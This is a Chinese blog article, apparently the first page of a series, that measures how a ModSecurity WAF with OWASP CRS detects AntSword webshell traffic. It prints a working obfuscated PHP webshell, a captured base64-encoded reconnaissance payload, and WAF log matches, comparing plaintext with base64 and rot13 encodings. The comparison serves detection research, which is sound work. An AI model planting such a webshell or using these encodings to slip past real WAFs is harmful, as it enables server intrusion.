WAF对WebShell流量检测的性能分析
来源:岁月联盟
时间:2020-02-10
Content-Length: 136
Connection: close
Content-Type: text/html; charset=UTF-8
620e2fc/var/www/html./.Linux localhost.localdomain 3.10.0-1062.9.1.el7.x86_64 #1 SMP Fri Dec 6 15:49:49 UTC 2019 x86_64.apache71a0ccfbc1
为了更加清楚antsword发出的流量包,我认真看了一下发的包,并查了一些相关函数,做注释的同时感叹了PHP函数的牛逼,并勾起了我的好奇心,对这几个函数做了本地测试。
echo posix_getegid();
echo posix_getlogin();
echo get_current_user();
echo php_uname();
0
t1ger
root
Linux localhost.localdomain 3.10.0-1062.9.1.el7.x86_64 #1 SMP Fri Dec 6 15:49:49 UTC 2019 x86_64
果然牛逼!和返回包现象保持了一致。同时也说明了如果明文直接进行探测,这种流量在waf面前无异于自投罗网!
明文流量检测
waf测试结果如下:
Message: Warning. Pattern match "^[//d.:]+$" at REQUEST_HEADERS:Host. [file "/etc/httpd/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "708"] [id "920350"] [msg "Host header is a numeric IP address"] [data "192.168.1.13"] [severity "WARNING"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"]
Message: Warning.
.....
.....
Apache-Handler: php5-script
Stopwatch: 1580358081210887 7750 (- - -)
Stopwatch2: 1580358081210887 7750; combined=5379, p1=753, p2=4202, p3=42, p4=155, p5=227, sr=194, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.2 (http://www.modsecurity.org/); OWASP_CRS/3.2.0.
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
Engine-Mode: "DETECTION_ONLY"
统计数据如下,匹配规则数按照grep line|wc -l计算
Apache-Error
Message
匹配规则数
level
11
11
22
3
接下来我们先测对称密码。
Base64&&rot13 webshell配置
Antsword自带几个可供测试的shell,给我们提供了非常大的方便。
我顺便贴一下代码。先来看看base64的代码
$ant=base64_decode("YXNzZXJ0");
$ant($_POST['ant']);
?>
Base64&&rot13 流量分析
POST /php_assert_script.php HTTP/1.1
Host: 192.168.1.13
Accept-Encoding: gzip, deflate
User-Agent: antSword/v2.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 942
Connection: close
ant=%40eval(%40base64_decode(%24_POST%5Bq9c4fa426fb243%5D))%3B&q9c4fa426fb243=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwgIjAiKTtAc2V0X3RpbWVfbGltaXQoMCk7ZnVuY3Rpb24gYXNlbmMoJG91dCl7cmV0dXJuICRvdXQ7fTtmdW5jdGlvbiBhc291dHB1dCgpeyRvdXRwdXQ9b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7ZWNobyAiMzRhZTE3IjtlY2hvIEBhc2VuYygkb3V0cHV0KTtlY2hvICI1YmJhN2YiO31vYl9zdGFydCgpO3RyeXskRD1kaXJuYW1lKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7aWYoJEQ9PSIiKSREPWRpcm5hbWUoJF9TRVJWRVJbIlBBVEhfVFJBTlNMQVRFRCJdKTskUj0ieyREfQkiO2lmKHN1YnN0cigkRCwwLDEpIT0iLyIpe2ZvcmVhY2gocmFuZ2UoIkMiLCJaIilhcyAkTClpZihpc19kaXIoInskTH06IikpJFIuPSJ7JEx9OiI7fWVsc2V7JFIuPSIvIjt9JFIuPSIJIjskdT0oZnVuY3Rpb25fZXhpc3RzKCJwb3NpeF9nZXRlZ2lkIikpP0Bwb3NpeF9nZXRwd3VpZChAcG9zaXhfZ2V0ZXVpZCgpKToiIjskcz0oJHUpPyR1WyJuYW1lIl06QGdldF9jdXJyZW50X3VzZXIoKTskUi49cGhwX3VuYW1lKCk7JFIuPSIJeyRzfSI7ZWNobyAkUjs7fWNhdGNoKEV4Y2VwdGlvbiAkZSl7ZWNobyAiRVJST1I6Ly8iLiRlLT5nZXRNZXNzYWdlKCk7fTthc291dHB1dCgpO2RpZSgpOw%3D%3D
base64加密之后的流量除了eval之外至少不会包含那么多的高危函数,加密之后我们再来测试。
Base64&&rot13 webshell流量检测
waf测试结果如下:
Message: Warning. Pattern match "^[//d.:]+$" at REQUEST_HEADERS:Host. [file
Message: Warning. Matched phrase "base64_decode" at ARGS:ant. [file "/etc/httpd/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "301"] [id "933150"] [msg "PHP Injection Attack: High-Risk PHP Function Name Found"] [data "Matched Data: base64_decode found within ARGS:ant: @eval(@base64_decode($_post[y07ae431d0730c]));"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"]
...
...
统计数据如下
Apache-Error
Message
匹配规则数
level
7
7
14
3
通过Antsword界面配置rot13加密及解密,抓包看了下流量,仅仅是将base64的加密函数变成了str_rot13
ant=%40eval(%40base64_decode -> ant=%40eval(%40str_rot13(
拦截数据和base差不多,waf统计数据如下
Apache-Error
Message
匹配规则数
上一页 [1] [2] [3] 下一页
上一篇:HTTP请求走私详解
下一篇:PHP代码审计之入门实战
